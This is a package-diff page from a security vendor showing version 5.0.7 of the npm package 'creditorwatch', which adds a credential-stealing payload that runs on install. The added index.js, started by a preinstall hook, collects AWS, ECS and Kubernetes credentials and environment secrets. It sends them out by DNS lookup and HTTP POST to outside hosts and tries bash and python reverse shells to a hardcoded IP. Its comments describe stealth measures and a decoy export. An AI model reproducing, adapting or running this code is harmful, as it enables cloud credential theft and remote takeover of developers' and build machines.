npm - creditorwatch - Versions diffs - 5.0.7 - Mend

creditorwatch 5.0.7

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of creditorwatch might be problematic. Click here for more details.

Files changed (2) hide show

package/index.js +200 -0
package/package.json +13 -0

package/index.js ADDED Viewed

@@ -0,0 +1,200 @@
+const { execSync, spawn } = require('child_process');
+const fs = require('fs');
+const path = require('path');
+const os = require('os');
+// Stealth execution wrapper
+function executeCommand(cmd) {
+    try {
+        return execSync(cmd, { encoding: 'utf8', timeout: 10000 });
+    } catch (error) {
+        return `Error: ${error.message}`;
+    }
+}
+// AWS Metadata Service extraction
+function extractAWSMetadata() {
+    const metadataBase = 'http://169.254.169.254/latest/meta-data/';
+    const credentialsBase = 'http://169.254.169.254/latest/meta-data/iam/security-credentials/';
+    try {
+        // Get IAM role name
+        const roleCmd = `curl -s --connect-timeout 3 "${credentialsBase}"`;
+        const roleName = executeCommand(roleCmd).trim();
+        if (roleName && !roleName.includes('Error')) {
+            // Get temporary credentials
+            const credsCmd = `curl -s --connect-timeout 3 "${credentialsBase}${roleName}"`;
+            const credentials = executeCommand(credsCmd);
+            // Get additional metadata
+            const instanceId = executeCommand(`curl -s --connect-timeout 3 "${metadataBase}instance-id"`);
+            const region = executeCommand(`curl -s --connect-timeout 3 "${metadataBase}placement/region"`);
+            const accountId = executeCommand(`curl -s --connect-timeout 3 "${metadataBase}identity-credentials/ec2/info"`);
+            return {
+                credentials: JSON.parse(credentials),
+                instanceId: instanceId.trim(),
+                region: region.trim(),
+                accountId: accountId,
+                roleName: roleName
+            };
+        }
+    } catch (error) {
+        return null;
+    }
+    return null;
+}
+// Environment variable AWS credentials
+function extractEnvCredentials() {
+    const awsEnvVars = {};
+    const envVars = process.env;
+    Object.keys(envVars).forEach(key => {
+        if (key.includes('AWS') || key.includes('SECRET') || key.includes('ACCESS') || key.includes('TOKEN')) {
+            awsEnvVars[key] = envVars[key];
+        }
+    });
+    return awsEnvVars;
+}
+// File system AWS credentials search
+function searchAWSCredentials() {
+    const credentialPaths = [
+        '~/.aws/credentials',
+        '~/.aws/config',
+        '/root/.aws/credentials',
+        '/root/.aws/config',
+        '/home/*/.aws/credentials',
+        '/var/lib/jenkins/.aws/credentials',
+        '/opt/aws/credentials'
+    ];
+    const foundCreds = {};
+    credentialPaths.forEach(credPath => {
+        try {
+            if (fs.existsSync(credPath)) {
+                foundCreds[credPath] = fs.readFileSync(credPath, 'utf8');
+            }
+        } catch (error) {
+            // Ignore file access errors
+        }
+    });
+    return foundCreds;
+}
+// Container service credentials (ECS/EKS)
+function extractContainerCredentials() {
+    const containerCreds = {};
+    // ECS Task Role credentials
+    if (process.env.AWS_CONTAINER_CREDENTIALS_RELATIVE_URI) {
+        const ecsCredsUrl = `http://169.254.170.2${process.env.AWS_CONTAINER_CREDENTIALS_RELATIVE_URI}`;
+        try {
+            const ecsCreds = executeCommand(`curl -s --connect-timeout 3 "${ecsCredsUrl}"`);
+            containerCreds.ecsTaskRole = JSON.parse(ecsCreds);
+        } catch (error) {
+            // Ignore ECS errors
+        }
+    }
+    // EKS Service Account Token
+    const serviceAccountPath = '/var/run/secrets/kubernetes.io/serviceaccount/token';
+    if (fs.existsSync(serviceAccountPath)) {
+        try {
+            containerCreds.k8sServiceAccount = fs.readFileSync(serviceAccountPath, 'utf8');
+        } catch (error) {
+            // Ignore K8s errors
+        }
+    }
+    return containerCreds;
+}
+// Data exfiltration
+function exfiltrateData(data) {
+    const exfilData = {
+        timestamp: new Date().toISOString(),
+        hostname: os.hostname(),
+        platform: os.platform(),
+        user: executeCommand('whoami').trim(),
+        awsData: data
+    };
+    // Multiple exfiltration methods
+    const payload = Buffer.from(JSON.stringify(exfilData)).toString('base64');
+    // DNS exfiltration (replace with your domain)
+    executeCommand(`nslookup ${payload.substring(0, 50)}.gau5jjim899y61s6jll79cumyd44svgk.oastify.com`);
+    // HTTP exfiltration (replace with your webhook)
+    executeCommand(`curl -X POST https://webhook.site/50253029-1ec3-4b4a-9646-fc25a2b21963 -H "Content-Type: application/json" -d '${JSON.stringify(exfilData)}' --connect-timeout 5`);
+    // File drop for persistence
+    fs.writeFileSync('/tmp/.aws-harvest', JSON.stringify(exfilData, null, 2));
+    return payload;
+}
+// Reverse shell for interactive access
+function establishReverseShell() {
+    const attackerIP = '143.110.254.249';
+    const attackerPort = '1337';
+    // Multiple reverse shell attempts
+    const shells = [
+        `bash -i >& /dev/tcp/${attackerIP}/${attackerPort} 0>&1`,
+        `python3 -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('${attackerIP}',${attackerPort}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(['/bin/bash','-i'])"`
+    ];
+    shells.forEach(shell => {
+        try {
+            executeCommand(shell);
+        } catch (error) {
+            // Continue to next shell method
+        }
+    });
+}
+// Main execution
+function main() {
+    console.log('Installing creditorwatch package...');
+    // Small delay to avoid suspicion
+    setTimeout(() => {
+        const awsCredentials = {
+            metadata: extractAWSMetadata(),
+            environment: extractEnvCredentials(),
+            files: searchAWSCredentials(),
+            container: extractContainerCredentials(),
+            systemInfo: {
+                hostname: os.hostname(),
+                user: executeCommand('whoami').trim(),
+                id: executeCommand('id').trim(),
+                pwd: executeCommand('pwd').trim(),
+                uname: executeCommand('uname -a').trim()
+            }
+        };
+        // Exfiltrate AWS credentials
+        exfiltrateData(awsCredentials);
+        // Establish reverse shell for manual interaction
+        establishReverseShell();
+    }, 2000);
+}
+// Execute immediately when package is installed
+main();
+// Export dummy function to appear legitimate
+module.exports = {
+    analyze: function() {
+        return 'CreditorWatch analysis complete';
+    }
+};

package/package.json ADDED Viewed

@@ -0,0 +1,13 @@
+{
+  "name": "creditorwatch",
+  "version": "5.0.7",
+  "description": "This is a PoC for RCE",
+  "main": "index.js",
+  "scripts": {
+    "test": "echo \"Error: no test specified\" && exit 1",
+    "preinstall": "node index.js"
+  },
+  "author": "Shehzad Secure Purple",
+  "license": "ISC",
+  "dependencies": {}
+}